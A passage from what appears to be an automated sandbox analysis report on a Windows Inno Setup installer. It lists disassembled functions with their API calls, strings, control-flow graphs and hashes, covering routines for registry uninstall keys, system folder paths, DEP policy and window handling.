                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindSleepWindow
                                                                                                                                        • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                                                        • API String ID: 3078808852-3310373309
                                                                                                                                        • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                                        • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                                                                        • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                                                                        • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1632 483ac8-483acc 1625->1632 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1633 483b29-483b46 1628->1633 1634 483b3d-483b44 1628->1634 1629->1630 1632->1624 1635 483ace-483ad5 call 45271c 1632->1635 1633->1630 1634->1630 1635->1624 1639 483ad7-483ae4 GetProcAddress 1635->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                        • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                                                        • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                                                        • API String ID: 2230631259-2623177817
                                                                                                                                        • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                                        • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                                                                        • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                                                                        • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1686 468e84 1668->1686 1670 468e94-468eb9 call 42dd4c * 2 1669->1670 1671 468eeb-468ef2 1669->1671 1693 468ebb-468ec4 call 4314f8 1670->1693 1694 468ec9-468edb call 42dd4c 1670->1694 1673 468ef4-468f06 call 42dd4c 1671->1673 1674 468f38-468f3f 1671->1674 1687 468f16-468f28 call 42dd4c 1673->1687 1688 468f08-468f11 call 4314f8 1673->1688 1680 468f41-468f75 call 42dd4c * 3 1674->1680 1681 468f7a-468f90 RegCloseKey 1674->1681 1680->1681 1686->1669 1687->1674 1701 468f2a-468f33 call 4314f8 1687->1701 1688->1687 1693->1694 1694->1671 1704 468edd-468ee6 call 4314f8 1694->1704 1701->1674 1704->1671
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                                                                        Strings
                                                                                                                                        • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                                                                        • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                                                                        • Inno Setup: No Icons, xrefs: 00468E73
                                                                                                                                        • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                                                                        • Inno Setup: App Path, xrefs: 00468E4A
                                                                                                                                        • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                                                                        • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                                                                        • %s\%s_is1, xrefs: 00468E05
                                                                                                                                        • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                                                                        • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                                                                        • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                                                                        • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                        • API String ID: 47109696-1093091907
                                                                                                                                        • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                                        • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                                                                        • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                                                                        • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                          • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                                          • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                                        • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                                                                        • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
                                                                                                                                          • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                                                                                        • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                                                        • API String ID: 3771764029-544719455
                                                                                                                                        • Opcode ID: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                                        • Instruction ID: 88e29a10730232d74bbdb0c5b7d00c3ea12cf2700f44d19641833b453bfd909d
                                                                                                                                        • Opcode Fuzzy Hash: 23963da8b4b34a95ffd58041a931adf40c150fbdd8371ea61f0364dbdea36cdf
                                                                                                                                        • Instruction Fuzzy Hash: 1461CF74A00204AFDB10EBA5D8C2A9E7B69EB44319F90C47FE404A7392DB3C9A44CF5D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1957 4238e2 1954->1957 1958 4238e5-4238ef GetSystemMetrics 1954->1958 1955->1954 1956 4238c1-4238d2 call 408cbc call 40311c 1955->1956 1956->1954 1957->1958 1960 4238f1 1958->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1958->1961 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                                        • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                                                                                        • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                                                                                        • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                                                                                        • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                                                                                        • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                                                        • String ID: |6B
                                                                                                                                        • API String ID: 183575631-3009739247
                                                                                                                                        • Opcode ID: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                                                        • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                                                                                        • Opcode Fuzzy Hash: 4cae07da4ecbd82a5ef2c5022e230c145e19d211ee6ce0cd027d67cd6f27acc7
                                                                                                                                        • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1977 47ce78-47cece call 42c3fc call 4035c0 call 47cb3c call 4525d8 1986 47ced0-47ced5 call 453344 1977->1986 1987 47ceda-47cee9 call 4525d8 1977->1987 1986->1987 1991 47cf03-47cf09 1987->1991 1992 47ceeb-47cef1 1987->1992 1995 47cf20-47cf48 call 42e394 * 2 1991->1995 1996 47cf0b-47cf11 1991->1996 1993 47cf13-47cf1b call 403494 1992->1993 1994 47cef3-47cef9 1992->1994 1993->1995 1994->1991 1997 47cefb-47cf01 1994->1997 2003 47cf6f-47cf89 GetProcAddress 1995->2003 2004 47cf4a-47cf6a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2006 47cf95-47cfb2 call 403400 * 2 2003->2006 2007 47cf8b-47cf90 call 453344 2003->2007 2004->2003 2007->2006
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(74350000,SHGetFolderPathA), ref: 0047CF7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$]xI$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                                                        • API String ID: 190572456-256906917
                                                                                                                                        • Opcode ID: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                                                        • Instruction ID: ec9c61b31d03a4d18d2fa5da2167344019e511a33ceb5cf80618cf604467b355
                                                                                                                                        • Opcode Fuzzy Hash: c4b8d3d93c7f37bb14fa31bc5bbe574b3393d33fbabbe9beac26f258e91ad005
                                                                                                                                        • Instruction Fuzzy Hash: 20311D30E001499BCB10EFA5D5D1ADEB7B5EF44308F50847BE504E7281D778AE458B6D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2126 40631c-406336 GetModuleHandleA GetProcAddress 2127 406338 2126->2127 2128 40633f-40634c GetProcAddress 2126->2128 2127->2128 2129 406355-406362 GetProcAddress 2128->2129 2130 40634e 2128->2130 2131 406364-406366 SetProcessDEPPolicy 2129->2131 2132 406368-406369 2129->2132 2130->2129 2131->2132
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                        • API String ID: 3256987805-3653653586
                                                                                                                                        • Opcode ID: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                                        • Instruction ID: 935c6a5f7b98c90e27654dc67135d8c1f882d2ad5d8c1b9d0efaf55941893a49
                                                                                                                                        • Opcode Fuzzy Hash: fb4db72500fb8039bf9e982fa136c472a352d03826636d66c2b82dec8efce00d
                                                                                                                                        • Instruction Fuzzy Hash: 97E02D90380702ACEA1032B20D82F3B144C9B54B69B26543B7D56B51C7D9BDDD7059BD
                                                                                                                                        APIs
                                                                                                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                                        • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                                        • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$Prop
                                                                                                                                        • String ID: 3A$yA
                                                                                                                                        • API String ID: 3887896539-3278460822
                                                                                                                                        • Opcode ID: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                                        • Instruction ID: bcb4e109f9bb3244d1d15a250a8b19338fc20a7c4ef9bfc7c396c8b3ff51cb63
                                                                                                                                        • Opcode Fuzzy Hash: d9856cee796f57cc1685d9958f98130356579251106e4d85d69cc018d86e5275
                                                                                                                                        • Instruction Fuzzy Hash: 8C22D06508E3C05FE31B9B74896A5D57FA0EE13325B1D45DFC4C28B1A3D21E8A8BC71A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 2894 467180-46722a call 41461c call 41463c call 41461c call 41463c SHGetFileInfo 2903 46725f-46726a call 478e04 2894->2903 2904 46722c-467233 2894->2904 2909 46726c-4672b1 call 42c3fc call 40357c call 403738 ExtractIconA call 4670c0 2903->2909 2910 4672bb-4672ce call 47d33c 2903->2910 2904->2903 2905 467235-46725a ExtractIconA call 4670c0 2904->2905 2905->2903 2932 4672b6 2909->2932 2915 4672d0-4672da call 47d33c 2910->2915 2916 4672df-4672e3 2910->2916 2915->2916 2919 4672e5-467308 call 403738 SHGetFileInfo 2916->2919 2920 46733d-467371 call 403400 * 2 2916->2920 2919->2920 2928 46730a-467311 2919->2928 2928->2920 2931 467313-467338 ExtractIconA call 4670c0 2928->2931 2931->2920 2932->2920
                                                                                                                                        APIs
                                                                                                                                        • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                                                                          • Part of subcall function 004670C0: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00467158
                                                                                                                                          • Part of subcall function 004670C0: DestroyCursor.USER32(00000000), ref: 0046716E
                                                                                                                                        • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                                                                        • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00467301
                                                                                                                                        • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467327
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                                                        • String ID: c:\directory$shell32.dll$%H
                                                                                                                                        • API String ID: 3376378930-166502273
                                                                                                                                        • Opcode ID: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                                        • Instruction ID: 732e1a1751fb8a235258c93266195bfa595ebd68417bad8a6af0601d960a2915
                                                                                                                                        • Opcode Fuzzy Hash: d7a251f7ede599729126a20c6e5bc656e487c76ea0efebb03c6af550fa195c4c
                                                                                                                                        • Instruction Fuzzy Hash: 8A516070604244AFD710DF65CD8AFDFB7A8EB48308F1081A6F80897351D6789E81DA59
                                                                                                                                        APIs
                                                                                                                                        • GetActiveWindow.USER32 ref: 0042F58F
                                                                                                                                        • GetFocus.USER32 ref: 0042F597
                                                                                                                                        • RegisterClassA.USER32(004997AC), ref: 0042F5B8
                                                                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F68C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F5F6
                                                                                                                                        • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F63C
                                                                                                                                        • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F64D
                                                                                                                                        • SetFocus.USER32(00000000,00000000,0042F66F,?,?,?,00000001,00000000,?,00458352,00000000,0049B628), ref: 0042F654
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
